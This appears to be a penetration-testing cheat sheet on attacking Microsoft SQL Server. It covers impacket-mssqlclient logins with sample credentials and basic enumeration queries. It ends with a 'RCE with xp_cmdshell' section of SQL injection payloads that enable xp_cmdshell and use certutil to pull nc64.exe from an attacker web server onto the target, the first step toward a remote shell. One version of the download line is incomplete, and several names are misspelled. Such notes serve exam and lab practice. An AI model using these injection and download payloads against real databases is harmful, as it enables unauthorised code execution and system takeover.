# MSSQL ## SQLCMD A Windows built-in command-line tool that allows SQL queries to be run through the Windows command prompt or remotely from another machine. ## Impacket-MSSQLClient Impacket includes a tool (impacket-mssqlclient) that can be used to connecyt to a Windows machine running MSSQL. Be sure to use the **-windows-auth** keyword to use NTLM authentication. ```bash impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth ``` ## MSSQL Console Commands When using an SQL Server command line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. However, when running the command remotely, we can omit the GO statement since it's not part of the MSSQL TDS protocol. Show MSSQL version: ```sql SELECT @@version; ``` List all available databases: ```sql SELECT name FROM sys.databases; ``` List tables in a database: ```sql SELECT * FROM tampdb.information_schema.tables; ``` List all elements in a table: ```sql select * from tampdb.dbo.users; ``` We must specify the **dbo** table scheme between the database and the table name. ## RCE with xp\_cmdshell 1. 1';EXEC sp\_configure 'show advanced options', 1;RECONFIGURE;EXEC sp\_configure 'xp\_cmdshell', 1;RECONFIGURE-- 2. 3. try this and then 1';EXEC xp\_cmdshell 'certutil -urlcache -f c:/windows/temp/nc64.exe';-- 4. if you do not get a hit in your webserver, let me know {% code overflow="wrap" %} ``` 1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE-- then 1';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.x/nc64.exe c:/windows/temp/nc64.exe';-- ``` {% endcode %}